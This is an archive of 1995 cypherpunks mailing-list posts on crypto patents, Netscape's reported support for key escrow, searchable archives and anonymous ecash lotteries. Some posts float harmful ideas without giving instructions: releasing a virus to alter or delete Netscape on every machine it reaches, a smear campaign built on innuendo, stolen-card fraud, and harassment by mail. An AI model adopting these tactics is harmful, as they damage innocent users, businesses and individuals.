From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Thu, 30 Nov 1995 09:09:32 +0800
To: cypherpunks@toad.com
Subject: Re: Elliptic curves, patent status?
In-Reply-To: <199511290717.XAA29808@blob.best.net>
Message-ID: <199511300051.BAA26198@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai (weidai@eskimo.com) wrote:
> On Mon, 27 Nov 1995, James A. Donald wrote:
>
> > > [are there patents that cover all public key cryptography?]
> >
> > No, but RSA will litigate you with the objective of
> > inflicting extravagant legal costs regardless.
>
> RSADSI no longer owns the Stanford patents (Hellman-Merkel, 
> Diffie-Hellman) which they used to claim covered all public key 
> cryptography.  Those patents now belong to Cylink, who seems to be less 
> litigious.

Especially considering that they might lose the patents in a court case
next month.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 30 Nov 1995 16:47:58 +0800
To: Leslie Todd Masco <cypherpunks@toad.com
Subject: Re: META: Lycos & Searchable archives
Message-ID: <ace2aaae09021004dca7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:56 AM 11/30/95, Leslie Todd Masco wrote:

>Someone has expressed concern to me that the cypherpunks archives are
>searchable via Lycos.  Said person doesn't mind having the archives
>searchable to the smaller audience of people who go to the we-site,
>but is unhappy about net-wide searches turning up cypherpunks articles.
>
>Can we try to find a consensus on this?  My initial inclination was to
>shrug the concern off (properties of information, etc, as well as c'punks
>being a more-or-less anarchy and the express desire for some sort of
>searching mechanism for c'punks), but I thought I'd double check as I've
>been mostly out of touch for the better part of a year.

I'm not sure how we'll find a consensus, and I don't relish the thought of
seeing hundreds of responses to your point, but....here's my vote.

I say any self-respecting Cypherpunk should realize immediately that
_every_ word one has ever posted to Usenet, mailing lists, and other public
or semi-public fora will soon be instantly retrievable. (The rates of
growth of the Net and of storage densities make it clear that archiving
_all_ past public messages is not much harder than archiving only the most
recent ones...thus, I predict, in 2005 one will be able to buy a disk or
disks of _all_ Usenet traffic prior to, say, 2003.)

More immediately, the person or persons who object to Lycos/Deja
News/Excite searches of their words face an uphill battle. Satisfying them
would mean making the various archive sites (currently only yours, Todd,
but other sites also store the traffic) unavailable.

So, I say: "Get with the program." Don't say anything under your True Name
that you don't want job interviewers to pull up in their pro forma searches
of your Usenet involvement.

(Thank God the U.S. has none of those damned "data privacy laws" which
might interfere with how people access the Net.)

--Tim May, who has said many, many controversial or even embarassing things
over the years, but who thinks anyone offended by his comments is not
someone he would want to deal with anyway.

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 30 Nov 1995 17:03:02 +0800
To: sameer <cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <ace2ae070a021004a5e9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:44 AM 11/30/95, sameer wrote:
>http://www.cnet.com/Central/News/govt.html
>
>        Bad. Very Bad. And I was almost starting to like Netscape.

Thank you Sameer for pointing this out.

Jim Clark is actively working for the enemies of liberty and freedom.
Consider this quote:

"To secure Net communications, the government will need to have access to
private data exchanges using what is known as a key escrow security system,
said Clark. He added that an invincible security system for the Net is
possible, but such a system won't be built unless the government has a
stake in it. "That's where key escrow comes in," said Clark."

Note that this is beyond the "watered down" forms of "commercial key
escrow" that many advocates of forms of key escrow often like to talk about
(such as the nominally voluntary schemes espoused by TIS). This speech by
Clark is actually closer to the real truth of key escrow that we normally
here from public speakers: the government will need to have access,
therefore the key escrow will be mandatory, not voluntary.

Can Netscape continue to prosper? This latest issue won't kill it,
naturally, but I doubt a $5 billion market capitalization can persist when
a company has no technology that cannot be duplicated or bettered by
others. As an example, I use Netscape to do certain things, Eudora to do
other things, and Newswatcher to do still other things...I will switch to
an improved Web browser _much_ faster than I will switch to a new word
processor. I don't see much "staying power" inherent in Netscape's browser,
so I can't see how the company can maintain a market capitalization greater
than that of General Dynamics, CBS, and Apple.

I wonder what discussions Jim Clark has been having with the Feds?

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 30 Nov 1995 17:23:49 +0800
To: cypherpunks@toad.com
Subject: Re: ecash lottery (Was: ecash casino)
Message-ID: <ace2b2de0c021004c90a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:22 AM 11/30/95, Bill Frantz wrote:
>At 20:38 11/29/95 -0800, Timothy C. May wrote:
>>Have to be _very_ careful here. A variety of scams can be developed which
>>show lots of "small" winners, but which fail to show any large winners. The
>>lottery operators can make a lot of extra bucks by simply not paying off
>>the large winnings, in various ways.
>
>With complete anonimity, the scam I would think of first is giving other
>nyms of myself all the big payoffs.

Yes, this is a good example of one of the scams.

If the lottery can't/won't reveal True Names of winners--a basic design
criterion--then clearly people may have doubts.

The whole thing can be cast as follows;

"Send us money and we'll put your name in a hat. We'll let you know if you
win, but we won't tell the public who won." (This problem is quite similar
to voting protocols, so we might look to "fair voting" protocols for
ideas.)

My intuition (hand-waving) is that an anonymous lottery is possible, but I
haven't looked at the details. Certainly multiple trusted holders of keys
(escrow agents) would help make the lottery fair. Maybe bit commitment
would help (each player buys the right to play, then "commits" his number.
A public reading of the winning number occurs, and the winner can reveal
his winning number (anonymously if he wishes, providing he had registered
his hash....).

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 1 Dec 1995 09:12:40 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Applied Cryptography Questions
In-Reply-To: <199511300614.HAA08769@utopia.hacktic.nl>
Message-ID: <199511300754.CAA12171@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous (hence the public reply) writes:
> A couple questions about Applied Cryptography (Second Edition)

I only have the 1st, but I won't consult it for this anyway....

> 1. What on earth is a Neural Net?

This sounds like a troll, since we recently had a thread about the possible
use of neural nets in cryptographic applications, and the precise text used
in AC2 to discuss this matter. Very roughly, a neural net is an abstract 
model of a network of neurons in a brain, used in artificial intelligence as
a model of computation. I imagine you could easily have found more complete
information by doing some trivial net search for "neural net".

> 2. Consider the Chinese Lottery attack vs a processor bank.
> 
>    ADVANTAGES
>      Distributed computing, no easy bombing target.
> 
>    DISADVANTAGES
>      39% inefficient
>      Need specialized hardware [for speed] or transmission of alogrithms
>        for any specific alogrithm
>      Not on all the time
>      If value(crack) * cracks/chip > cost of chip, then why not have
>        the gov buy the chips? Its probably cheaper that way.

Well, is it in fact "probably cheaper" ?  If value(crack) > cost(chip) >
cost(attack) then the attack makes more sense....

> 4. Does there exist an n such that a keyspace of 2^n is trivial to crack
>    [ie a matter of miniutes] on a PC but is difficult to crack for a 
>    big commercial company or even a major government? [this question
>    relates to Merkle's puzzles, when a 40-bit key seems a bit weak.]

I think you need to explain more for this question to make sense. Obviously
companies (even big ones) and governments (even major ones) could buy and use
PCs themselves, in the event that conferred some cryptanalytic advantage.

ObLycos: Hey, better still, let's put the archives in an export-controlled
directory. We don't want too many outsiders to hear about the privacy
advantages of strong cryptography, now do we ?

ObAlices: <yawn>

-Futplex <futplex@pseudonym.com>
"I look pretty young but I'm just backdated" -The Who




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 30 Nov 1995 16:20:41 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199511300644.WAA02011@infinity.c2.org>
Message-ID: <199511300807.DAA12251@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


sameer writes:
> http://www.cnet.com/Central/News/govt.html

I think this is sufficiently important for a partial quotation:

---------------------------------------------
By Anne Knowles 	November 29, 1995, 12 p.m. PT

   BOSTON--Getting the government involved in maintaining Internet data
 privacy may not be popular, but it's going to be necessary. That's the message
 Netscape Communications chair Jim Clark delivered this morning in his keynote
 address to an audience here at Email World and Internet Expo. 

   To secure Net communications, the government will need to have access to
 private data exchanges using what is known as a key escrow security system,
 said Clark. He added that an invincible security system for the Net is 
 possible, but such a system won't be built unless the government has a stake 
 in it. "That's where key escrow comes in," said Clark. 
---------------------------------------------

> 	Bad. Very Bad. 

Agreed. As of a moment ago I could find absolutely no mention of this on
Netscape's web pages. I hope they will at least have the courage to put out a
"We Support Clipper II" press release. Now the question is, how much of a
role does Netscape Communications intend to play in implementing GAK, and
what can we do to counter it ?

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 30 Nov 1995 21:02:47 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: The future will be easy to use
In-Reply-To: <199511300704.XAA01742@blob.best.net>
Message-ID: <199511300819.DAA10897@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jon Lasser writes:
> However, if you have optional linking of ID and name, shippers will only 
> ship to keys with such attributes. Because just ID and address, it could 
> be a "hit and run" type attack shipped to a safe maildrop.

People who steal credit cards prefer to order goods to be delivered somewhere
they can grab them. (Often this is just the front of the rightful owner's
home, while Holly the Homeowner is off at work.) But that's just another
reason to cut down unauthorized credit card charges, not a reason to restrict
what a rightful cardholder can do with the card. I _want_ to be able to have
stuff delivered to arbitrary locations, and I _don't_ want to give that up
just to make it tough on thieves.

James Donald writes:
> This argument makes no sense at all:  I am going to attack my
> enemies by paying people to send books, computers, and stuff
> to them?

Ordering hardcore porno videos to be sent to, say, somewhere in Tennessee
might work pretty well in our sadly repressed society.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 30 Nov 1995 17:29:36 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <ace2ae070a021004a5e9@[205.199.118.202]>
Message-ID: <199511300918.EAA13821@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  What's the point? Surely Clark must realize that even if Netscape
adds key escrow to SSL/Secure Courier, it is still possible to tunnel
real encryption through that link thus thwarting the escrow system.
In fact, this is the perfect job for Java:

1) Client connects to server thru insecure key-escrow channel and downloads
Java applet
2) Java applet opens new connection to server using "invincible" security
as Clark puts it, and performs add transactions on this channel. In fact,
in the future, a large number of "forms" will be Java applets which
submit information back to the server themselves.

  And what about IPSEC ESP? Even if the application layer is weak,
the link layer can more than make up for it.

  Now, Netscape has momentum, and if they set a key-escrow standard, there
is a chance of it being adopted widely. However, Java applets and IPSEC
can still make transactions through an insecure netscape payment/encryption
channel.

  The genie is out of the bottle.

-Ray






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 30 Nov 1995 22:58:26 +0800
To: cypherpunks@toad.com
Subject: Quit it!
Message-ID: <199511300520.GAA07040@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


I am me!  

No I am not!

Yes I am!

No I'm not!  

  Alice de 'nonymous ...
  
                                    ...just another one of those...
  
  
  P.S.  This post is in the public domain.
                      C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
  
  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Thu, 30 Nov 1995 19:31:21 +0800
To: Leslie Todd Masco <cactus@hks.net>
Subject: Re: META: Lycos & Searchable archives
In-Reply-To: <199511300556.AAA15009@bb.hks.net>
Message-ID: <Pine.3.89.9511300640.B15267-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 30 Nov 1995, Leslie Todd Masco wrote:

> Someone has expressed concern to me that the cypherpunks archives are
> searchable via Lycos.  Said person doesn't mind having the archives
> searchable to the smaller audience of people who go to the we-site,
> but is unhappy about net-wide searches turning up cypherpunks articles.

Lycos only has a database of abstracts of the archive (which is still 
commendable) and the other databases have smallish local archives of the list. 
There's no way to do a compleat search at present (other than manual labor and 
writing 'bots). A true search engine at the site would be a godsend. 
I presume that people who post want their posts read.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 30 Nov 1995 19:53:07 +0800
To: sameer <cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <2.2b8.32.19951130114416.00950858@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:44 PM 11/29/95 -0800, sameer wrote:
>http://www.cnet.com/Central/News/govt.html
>
>	Bad. Very Bad. And I was almost starting to like Netscape.
>

But I did like the story's description of Damien Doligez as a "group of
French scientists."

DCF

"Who used to have a personal life but who now does nothing but download Beta
upgrades from the Net."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 30 Nov 1995 21:09:31 +0800
To: cypherpunks@toad.com
Subject: Re: The future will be easy to use
In-Reply-To: <199511300819.DAA10897@opine.cs.umass.edu>
Message-ID: <96oDFD11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


futplex@pseudonym.com (Futplex) writes:
> People who steal credit cards prefer to order goods to be delivered somewhere
> they can grab them.

For most goods, yes. But one could use a stolen credit card, e.g., to set
up an account on AOL / CompuServe and download tons of software, charging
it to the card.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 30 Nov 1995 14:32:34 +0800
To: cypherpunks@toad.com
Subject: Applied Cryptography Questions
Message-ID: <199511300614.HAA08769@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


A couple questions about Applied Cryptography (Second Edition)

1. What on earth is a Neural Net?

2. Consider the Chinese Lottery attack vs a processor bank.

   ADVANTAGES
     Distributed computing, no easy bombing target.

   DISADVANTAGES
     39% inefficient
     Need specialized hardware [for speed] or transmission of alogrithms
       for any specific alogrithm
     Not on all the time
     If value(crack) * cracks/chip > cost of chip, then why not have
       the gov buy the chips? Its probably cheaper that way.

3. How does one cryptoanalyize a Feistel Network? I've read a bit
   on this and it doesn't seem that the papers are consistant,
   for example, one claims that 2^32 chosen plaintext is unreasonable
   for a 64-bit block cipher whereas DES's cryptanalysis requires
   something like 2^42.

4. Does there exist an n such that a keyspace of 2^n is trivial to crack
   [ie a matter of miniutes] on a PC but is difficult to crack for a 
   big commercial company or even a major government? [this question
   relates to Merkle's puzzles, when a 40-bit key seems a bit weak.]

5. Is there an errata yet?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 1 Dec 1995 16:49:11 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199511300644.WAA02011@infinity.c2.org>
Message-ID: <9511301328.AA01664@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
 > have lots of stuff attributed to Jim, but very little of it is actual
 > quotes.


Well, if there was in fact a speech made from which the pseudo-quotes
in the article were taken, then surely the full text of that speech
will be made available somewhere for clarification.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 2 Dec 1995 03:34:01 +0800
To: cypherpunks@toad.com
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
Message-ID: <199512011556.HAA08776@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:01 AM 12/1/95 -0800, Timothy C. May wrote:
>I hope the media types reading now will attend the December 5th (I
>think...details should be available) gathering on "key escrow" in
>Washington. D.C. This should be a fiery meeting, especially if the Netscape
>reps (I assume someone from Netscape will be attending, given their central
>role in the all-important Web world) either denounce GAK or support GAK.


I will prepare the netscape dehanced dirty pictures web page, 
but not advertize the URL until shortly after December 5th.

I hope to hear a suitable "clarification" before then.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 1 Dec 1995 00:54:27 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: Credit card theft Re: The future will be easy to use
In-Reply-To: <Pine.3.89.9511300805.B35014-0100000@tesla.cc.uottawa.ca>
Message-ID: <199511301606.IAA17493@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Or c2.org, which might then make things interesting if the theft is detected.
> (in a very perverse, and tooth-gnashingly aggravating way, of course).
> Would Sameer cooperate with the LEAs to catch "an anonymous suspect using
> his service"? 

	Community ConneXion will comply with all properly formed court
orders and subpeonas. We will *not* cooperate without court
intervention. (I.e. Mr. FBI calls up and says "can you help us find
this suspect"? I respond "got a subpoena?")

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 1 Dec 1995 00:53:51 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <30BD716E.5F69@netscape.com>
Message-ID: <199511301616.IAA18452@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Can we get the text of the actual speech?

Unless Netscape officially issues a statement on their home page, and
as a press release, saying that the press coverage was wrong and
Netscape is *against* any and all forms of GAK, then I think we should
assume that Netscape official position is in favor of GAK, and speak
out about it as such.

	It is very damn close to the wire. Even though the speech may
have been misreported, it is the reporting that affects public
opinion. Even if Netscape has no current products or plans to release
products implementing GAK, in light of this press coverage, unless
they issue a statement saying they are against GAK, then they are for
GAK.
	I haven't given up on Netscape, yet-- I'm waiting for an
official word.

	Jeff: If Netscape comes out in favor of GAK, will you leave?
(Wait until February, at least, of course..) You don't have to answer
that to me, or the list, just think about it, and answer it for
yourself.  Do you think "anyone else" there would leave, as you say
below that they don't want to go down history, etc...

> 
> sameer wrote:
> > 
> > http://www.cnet.com/Central/News/govt.html
> > 
> >         Bad. Very Bad. And I was almost starting to like Netscape.
> 
>   Please don't give up on us yet.  All press accounts I've read so far
> have lots of stuff attributed to Jim, but very little of it is actual
> quotes.  There appears to be lots of paraphrasing and interpretation
> being done on the part of the reporters.  The impression that I'm
> getting is that the press has blown a couple of small sound bites
> way out of proportion.  The infoworld article that covers the same
> speech only devotes about 20% of the article to the key escrow topic,
> and is similarly devoid of actual quotes.
> 
>   I have not spoken to Jim about this, and I did not hear the talk
> myself, so I'm mostly reading between the lines here.  After I saw the
> story earlier today I started asking around to see if the company
> had made any major policy shift in the direction of GAK, and wasn't
> able to turn up anything.  If anything its the opposite.
> 
>   My feelings about key escrow, which were echo'd by several folks
> in management when I spoke to them today are:
> 
> 	o Government mandated escrow would be a bad thing
> 	o There are some settings where escrow is good, in the corporate
> 		setting, or as a matter of person choice(to protect against
> 		loss of password)
> 	o The whole issue of escrow should be de-coupled from the
> 		export issue
> 
>   I don't want to go down in history as a facilitator of the totalitarian
> state, and I don't think anyone else here does either.  I hope folks
> wait for press releases, product announcements, etc. before condemning us
> too much.  Jim has made comments in the past that were quoted out of
> context, and blown way out of proportion to the point that some people
> believed that we were monitoring our user's every keystroke and sending
> it all back to the home office to generate huge demographic databases.
> I suspect that this is the same sort of thing, and I hope everyone will
> judge us by what we do.
> 
> 	--Jeff
> 
> PS - you won't find a LEF in the soon to be released SSL Version 3 spec...
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 30 Nov 1995 21:37:42 +0800
To: cypherpunks@toad.com
Subject: RED_sky
Message-ID: <199511301327.IAA13236@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-30-95. W$Jiver, Page One lead:

   "New Satellite Imaging Could Soon Transform The Face of the
   Earth. Big Worries About Security."

      Next time you gaze into the heavens, practice your
      smile. The ventures being backed by companies such as
      Lockheed Martin Corp., the E-Systems Corp. and Orbital
      Sciences Corp. will offer days-old digital images of
      unprecedented clarity. These corporate systems worry
      some scientists and federal policy makers concerned
      about privacy invasion and a free-for-all expansion of
      espionage. One notes that Lockheed Martin and E-Systems
      already have such systems in space. "They do this for
      the intelligence agencies. The very system that they're
      putting up there is a classified system now."

      A Senate staffer says that as budgets are chopped for
      the NRO and military satellite operators, the commercial
      systems will offer lower-cost images for government
      needs, preserve jobs and know-how in a vital area of
      technology and ensure U.S. leadership in the imaging
      industry. Nations such as France, Russia, South Africa,
      India and Israel are contemplating expanded use of their
      high-resolution systems.

   RED_sky  (16 kb)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Thu, 30 Nov 1995 21:52:39 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <ace2ae070a021004a5e9@[205.199.118.202]>
Message-ID: <Pine.3.89.9511300825.A27268-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, Timothy C. May wrote:

> 
> Can Netscape continue to prosper? This latest issue won't kill it,

I suspect this will unfortunately help. Stockholders are interested in 
profits, not principles. Co-oping with the feds will help Netscape get to 
the commercial market sooner, and most customers, sadly don't give a damn 
about privacy (or don't understand).

Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 1 Dec 1995 01:42:15 +0800
To: dmandl@bear.com (David Mandl)
Subject: Re: "Got a subpoena?"
In-Reply-To: <Pine.SUN.3.91.951130113015.132b-100000@goya>
Message-ID: <199511301704.JAA23295@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> "finessing" laws will become more important.  In short, they WILL have
> a subpoena--then what?

	Then they'll find out that I don't have any information that
could help them, anyway.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Fri, 1 Dec 1995 11:31:34 +0800
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199511300849.JAA13845@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.951130090706.26033A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, Anonymous wrote:

>       Aleph One's suggestion -- an NS-hack or "virus" -- doesn't make any
> sense: if Perry or someone would vet a hacked copy, I'd use it in a
> second. But hacking it would involve a violation of the license, so hacked
> versions couldn't be offered in any above-ground way: there'd be no way to
> certify a hacked copy with a trusted nym's key.

	You seem to have missed the point. A "virus" is not there to fix
your copy because you want it. Its there because I  want it. I would
be released so that infects all possible machines. It would either
remove the rutines in netsape that allow escrow or simple remove the 
offensive copy of netscape ( cant use it if its not there 8)
Violation of the license? really? Like virus writers give a damm.

>       Netscape is between a rock and a hard place: I think it's safe to
> say that, were all things equal, NS would support strong crypto. The fact
> that NS has decided otherwise suggests that some pressure was applied:
> Clark says as much. This leads me to believe that one possibly effective
> (and possibly dangerous) tactic might lie in a seriously sustained attack
> on NS's reputation -- keeping up a meme-drumbeat of "you can't trust
> Netscape, that's all, you'll get ripped off." I think we should try it --
> TODAY, now, persistently and loudly, until NS comes around. I'm not saying
> that this'll be enough, but it's a start. TODAY. And I really don't care
> what it takes: calling cronies in the press, spreading innuendo, redoing
> NS icon sets so there's a spy from "Spy Versus Spy" loitering behind the
> N... I've seen some nice "NO Netscape" tags on GNU-related pages. Let's do
> it.

	Yes and you must remember the power of the net. As an example remember
the heat Microsoft took for the Registration Wizard what all it does is 
ASK YOU if you would like to submit the recorded information about your 
computer to Microsoft. It was so blow out of proportion that it even made 
it to places that would check this kinda of stuff like Information Week.

> 
> Hieronymous
> FB DD B5 C8 FB F4 52 41  F0 0F A0 6E 99 43 75 06
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQBVAwUBML1vc73g0mNE55u1AQGfdgIAsldR3e9UQZG9//38B9LrU/HnCSzaY1kB
> RMOcBdab5EZ2X9BXkA7lIdDJUUqHOykuv1oyFDtitWRsXxmaTb0cuw==
> =0FmD
> -----END PGP SIGNATURE-----
> 

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Wed, 29 Nov 1995 22:30:17 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Diskless "Eunuchs" Machines Likely to Fail
Message-ID: <01HY7L2XIX3M922UYS@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --

-----BEGIN PGP SIGNED MESSAGE-----

From: Timothy C. May           \ Internet:    (tcmay@got.net)

TM> I'm skeptical of the "Diskless Internet Box = Telephone" analogy.

TM> Folks I know who are not computer-savvy, or who have other things
TM> they'd rather be doing, are not likely, as I see it, to buy boxes
TM> that still require them to type messages to other people but that
TM> don't allow them to download and save the interesting stuff they
TM> find.

TM> The telephone appealed to those who truly wanted to "just keep
TM> talking"...that was the beauty of it. Most people don't know how to
TM> touch-type, and typing by hunting-and-pecking is painful and unnatural
TM> for most people.

i guess it kinda depends upon the epoch in which you grow up. when
telephones were first introduced, it didn't seem as natural to people
as it does for us today. i've got a copy of the encyclopedia
britanica published in 1903 that has some _facinating_ stuff on
telecommunications. (i'm in the process of scanning it in. anyone who
is interested in it can email me an i'll send it to you when i'm
done. 1903=no copyright) 

i've seen people's typing skills improve remarkedly just through
sheer repetition. i think that hunt-and-peck falls to look-and-peck
if you find yourself typing to any serious degree rather quickly.


TM> A couple of years ago "the computer for the rest of us" was said to be
TM> a pen-based Newton-type machine, now it is said to be a diskless,
TM> memory-limited "Eunuchs" machine.

unless memory becomes _real cheap_ real fast, diskless workstations
won't do. i don't see why it would be so hard for those pushing these
machines to add enough disk to make it usable and still stay cheap. 

otoh, i don't think the internet is enough of a pull for people to
want machines like this even if they did have local storage. i figure
most people want computers to do something more for them than send
e-mail. hell, i can send e-mail with a modem and dumb terminal. (been
there-done that). i think the thing that will kill this idea will be
the simple fact that people expect a computer to do more than what
those pushing this 'technology' think they do.


TM> I see a greater chance that home game machines, such as the 3DO and
Sony
TM> PlayStation machines will get Web browsers done for them than I do that
TM> people will buy machines that are so limited.

good call. i think people will soon be expecting more out of those
game machinges than they currently do. i know i sure as hell would
given the price. why can't current came machines support
telecommunications? the modem i'm using to send this message is
running on a dsp chip. i remember playing falcon-at via modem several
years ago. it was a hoot even at the bauds available then. at 14.4 or
better it would be a real hoot.

TM> The only relevance of this whole topic to Cypherpunks
TM> is....is....minimal.

same here. however, what is happening in the computer business does
have _some_ relevance to crypto as we have to see where the market is
heading. 


amp
